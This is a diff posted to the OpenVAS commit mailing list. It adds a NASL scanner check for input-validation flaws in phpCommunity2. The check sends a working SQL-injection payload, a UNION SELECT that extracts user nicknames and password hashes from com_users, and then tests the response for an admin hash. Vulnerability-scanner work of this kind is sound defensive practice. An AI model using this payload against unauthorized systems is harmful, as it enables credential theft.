+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100041);
+ script_bugtraq_id(34056);
+ script_version ("1.0");
+
+ script_name(english:"phpCommunity2 Multiple Remote Input Validation Vulnerabilities");
+ desc["english"] = "
+
+ Overview:
+ phpCommunity2 is prone to multiple input-validation vulnerabilities,
+ including multiple directory-traversal issues and SQL-injection issues,
+ and a cross-site scripting issue.
+
+ Exploiting these issues could allow an attacker to view arbitrary
+ local files within the context of the webserver, steal cookie-based
+ authentication credentials, compromise the application, access or
+ modify data, or exploit latent vulnerabilities in the underlying
+ database.
+
+ See also:
+ http://www.securityfocus.com/bid/34056/
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if phpCommunity2 is vulnerable to Multiple Remote Input Validation Vulnerabilities");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/phpcom", cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, "/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if( buf == NULL )exit(0);
+
+ if ( buf =~ "admin:[a-f0-9]{32}" )
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
More information about the Openvas-commits
mailing list